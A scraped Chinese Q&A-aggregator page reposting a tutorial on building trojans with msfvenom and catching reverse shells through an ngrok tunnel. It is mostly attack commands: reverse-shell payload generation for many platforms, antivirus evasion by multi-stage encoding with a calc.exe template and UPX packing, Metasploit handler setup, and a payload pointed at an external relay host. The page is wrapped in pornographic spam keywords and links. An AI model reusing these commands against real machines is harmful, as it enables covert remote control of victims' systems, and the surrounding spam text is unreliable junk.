日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問(wèn) 生活随笔!

生活随笔

當(dāng)前位置: 首頁(yè) > 编程资源 > 编程问答 >内容正文

编程问答

msfvenom生成木马和内网穿透

發(fā)布時(shí)間:2024/6/3 编程问答 27 豆豆
生活随笔 收集整理的這篇文章主要介紹了 msfvenom生成木马和内网穿透 小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

msfvenom命令行選項(xiàng)如下:

英文原版

中文版:

Options:

-p, --payload?<payload> 指定需要使用的payload(攻擊荷載)。如果需要使用自定義的payload,請(qǐng)使用&#039;-&#039;或者stdin指定?

-l, --list [module_type] 列出指定模塊的所有可用資源. 模塊類型包括: payloads, encoders, nops, all?

-n, --nopsled?<length> 為payload預(yù)先指定一個(gè)NOP滑動(dòng)長(zhǎng)度?

-f, --format?<format> 指定輸出格式 (使用 --help-formats 來(lái)獲取msf支持的輸出格式列表)?

-e, --encoder [encoder] 指定需要使用的encoder(編碼器)?

-a, --arch?<architecture> 指定payload的目標(biāo)架構(gòu),這里x86是32位,x64是64位 -platform?<platform> 指定payload的目標(biāo)平臺(tái)?

-s, --space?<length> 設(shè)定有效攻擊荷載的最大長(zhǎng)度?

-b, --bad-chars?<list> 設(shè)定規(guī)避字符集,比如:?&#039;\x00\xff&#039;?

-i, --iterations?<count> 指定payload的編碼次數(shù)?

-c, --add-code?<path> 指定一個(gè)附加的win32 shellcode文件?

-x, --template?<path> 指定一個(gè)自定義的可執(zhí)行文件作為模板?

-k, --keep 保護(hù)模板程序的動(dòng)作,注入的payload作為一個(gè)新的進(jìn)程運(yùn)行 --payload-options 列舉payload的標(biāo)準(zhǔn)選項(xiàng)?

-o, --out?<path> 保存payload?

-v, --var-name?<name> 指定一個(gè)自定義的變量,以確定輸出格式?

--shellest 最小化生成payload?

-h, --help 查看幫助選項(xiàng) --help-formats 查看msf支持的輸出格式列表

這里舉出一些利用msfvenom生成shell的命令:

Linux:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect?On> -f elf > shell.elf

Windows:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your?IP?Address> LPORT=<Your?Port?to?Connect?On> -f exe > shell.exe

PHP:

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your?IP?Address> LPORT=<Your?Port?to?Connect?On> -f raw > shell.php

cat shell.php | pbcopy &&?echo?'<?php ' | tr -d?'\n' > shell.php && pbpaste >> shell.php

ASP:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your?IP?Address> LPORT=<Your?Port?to?Connect?On> -f asp > shell.asp

JSP:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your?IP?Address> LPORT=<Your?Port?to?Connect?On> -f raw > shell.jsp

Python:

msfvenom -p cmd/unix/reverse_python LHOST=<Your?IP?Address> LPORT=<Your?Port?to?Connect?On> -f raw > shell.py

Bash:

msfvenom -p cmd/unix/reverse_bash LHOST=<Your?IP?Address> LPORT=<Your?Port?to?Connect?On> -f raw > shell.sh

Perl:

msfvenom -p cmd/unix/reverse_perl LHOST=<Your?IP?Address> LPORT=<Your?Port?to?Connect?On> -f raw > shell.pl

以上是基本的生成后門木馬,只要想方設(shè)法放到目標(biāo)機(jī)器上,并運(yùn)行。在本地監(jiān)聽(tīng)端口即可,但是你需要有一個(gè)公網(wǎng)的ip


下面來(lái)探究一下如何免殺:

1.可以嘗試多重編碼:

msfvenom -p windows/meterpreter/reverse_tcp lhost=<Your IP Address> lport=<Your Port to Connect?On> -e x86/shikata_ga_nai -i?20 -f raw | msfvenom -e x86/alpha_upper -a x86 --platform windows -i?5 -f raw | msfvenom -e x86/shikata_ga_nai -a x86 --platform windows -i?10 -f raw | msfvenom -e x86/countdown -a x86 --platform windows -i?10 -x calc.exe -f exe -o shell.exe

這里使用管道讓msfvenom對(duì)攻擊載荷多重編碼,先用shikata_ga_nai編碼20次,接著來(lái)10次的alpha_upper編碼,再來(lái)10次的countdown編碼,最后才生成以calc.exe為模板的可執(zhí)行文件。

2.對(duì)上述生成的木馬進(jìn)行upx加殼

upx?shell.exe

不過(guò)現(xiàn)在的殺毒軟件越來(lái)越nb,一般免殺也已經(jīng)不好過(guò)...

?

下面以Aspx為例:

show payloads

use windows/shell_reverse_tcpinfoset?lhost 192.168.0.133set?lport 4444save

接著輸入generate -h 查看幫助:

各版本ShellCode的命令如下:

generate -t asp?//生成Asp版的ShellCode generate -t aspx?//生成Aspx版的ShellCode

把生成的木馬放在c:/inetpub/wwwroot下,訪問(wèn)。同時(shí)在msf中設(shè)置監(jiān)聽(tīng):

use exploit/multi/handler

set?payload windows/meterpreter/reverse_tcp

set?lhost 192.168.0.133set?lport 4444

run


補(bǔ)充:該方法一定要網(wǎng)速夠快,否則很容易失敗,本機(jī)監(jiān)聽(tīng)端口可選用4444端口或其他

parrot使用ngrok+msfvenom穿透反彈shell

外網(wǎng)中的內(nèi)網(wǎng)和我們不在同一個(gè)網(wǎng)段,所以我們需要搞一個(gè)公網(wǎng),讓受害者去訪問(wèn)我們的公網(wǎng),再在公網(wǎng)上搞個(gè)端口映射到我們內(nèi)網(wǎng),這樣就實(shí)現(xiàn)了內(nèi)網(wǎng)穿透

攻擊機(jī)parrot ip:192.168.127.131

目標(biāo)機(jī)器windows ip :192.168.43.27

首先兩臺(tái)機(jī)器不在一個(gè)網(wǎng)端,自然是無(wú)法ping通:

這里模仿目標(biāo)機(jī)器在公網(wǎng)

攻擊機(jī)器在內(nèi)網(wǎng),攻擊機(jī)器怎樣通過(guò)ngrok代理來(lái)接受彈回來(lái)的shell

?

1.在ngrok官網(wǎng)注冊(cè)賬號(hào),并開(kāi)通免費(fèi)賬號(hào)

官網(wǎng)地址:http://www.ngrok.cc


創(chuàng)建成功后:

2.下載ngrok客戶端

https://www.ngrok.cc/download.html

我這里使用的是parrot。所以選擇linux版本

文件解壓后得到:sunny

3.啟動(dòng)sunny,開(kāi)啟轉(zhuǎn)發(fā)

./sunny clientid 隧道id

4.配置木馬來(lái)反彈shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=free.idcfengye.com LPORT=14001 -f exe -o ./test.exe

其中LHOST,LPORT均為ngrok代理服務(wù)器地址與端口

5.攻擊機(jī)本地msf監(jiān)聽(tīng)

use?exploit/multi/handle?set?payload windows/meterpreter/reverse_tcp?set?lhost 192.168.127.131?set?lport 9876?run

6.目標(biāo)機(jī)器執(zhí)行木馬

可以看到,shell反彈成功

——嗷嗷








總結(jié)

以上是生活随笔為你收集整理的msfvenom生成木马和内网穿透的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 五月天久久久 | 无码粉嫩虎白一线天在线观看 | 97人妻精品一区二区免费 | 中文字幕avav | 丁香激情小说 | 欧美特级黄色 | 国产三级三级三级 | 午夜av不卡 | 日本大尺度电影免费观看全集中文版 | 青青草黄色 | 午夜精品一区二区在线观看 | 精品日韩制服无码久久久久久 | 日本亚洲欧美在线 | 国产精品网站在线 | 在线观看免费中文字幕 | 特级淫片裸体免费看冫 | 亚洲精品国产手机 | 看黄色网址 | 色婷婷综合久久久久中文一区二区 | 久久免费看片 | 中文字幕视频免费观看 | 爆乳熟妇一区二区三区 | 一区二区三区免费看视频 | 午夜影院一区 | jizz中国女人 | 熟女视频一区二区三区 | 成人18视频免费69 | 欧美黑粗大| 亚洲一区偷拍 | 国产成人a亚洲精v品无码 | av无毛| 国产盗摄一区二区三区在线 | 欧美成人午夜 | 青青草华人在线视频 | 亚洲美女综合 | 国产精品系列在线播放 | 一本色道久久综合亚洲精品按摩 | 欧美综合视频 | 插插影视 | av片亚洲 | 一区二区三区在线观看 | 绝顶高潮合集videos | 欧美用舌头去添高潮 | 天天干天天弄 | 一区二区在线影院 | 色中文在线| 国产精品久久久久久无人区 | 日本一区二区三区在线视频 | 日韩女优一区 | 九九热国产精品视频 | 国产第一页精品 | 黄色国产一区二区 | 哺乳期喷奶水丰满少妇 | 国产精品 色 | 国产午夜精品免费一区二区三区视频 | 手机在线看片福利 | 欧美日韩国产精品一区二区 | 亚洲乱码国产乱码精品精软件 | 冲田杏梨在线 | 久草aⅴ | 久久久久成人精品 | 日韩在线导航 | 亚洲区一区二区三区 | 欧美一区二区三区系列电影 | 中文字幕+乱码+中文乱码91 | 午夜试看120秒| 亚洲AV无码精品黑人黑人 | 影音先锋在线视频观看 | 手机在线一区二区三区 | 久草综合网 | 国产又粗又猛又黄又爽的视频 | 北条麻妃一区二区三区在线观看 | 农民工hdxxxx性中国 | 国产56页 | 国产麻豆电影在线观看 | 国产精品日日摸天天碰 | 成人黄色大片在线观看 | 国产在线视频自拍 | 成人免费毛片果冻 | 国产精品美女久久久久图片 | 欧美一区亚洲 | 人体毛片 | 大陆极品少妇内射aaaaa | 国精产品一区一区三区mba下载 | 69福利社区 | 亚欧洲精品在线视频 | 神马午夜在线 | 黑人巨大精品欧美一区二区 | 95看片淫黄大片一级 | 欧美又粗又大aaa片 老熟妇仑乱视频一区二区 亚洲妇女体内精汇编 | 日本www视频在线观看 | 91国内在线视频 | 五月天激情啪啪 | 你懂的在线观看网站 | 免费久久视频 | 美女隐私免费观看 | 亚洲天堂第一区 | 男人的天堂a在线 | 特级丰满少妇一级aaa爱毛片 |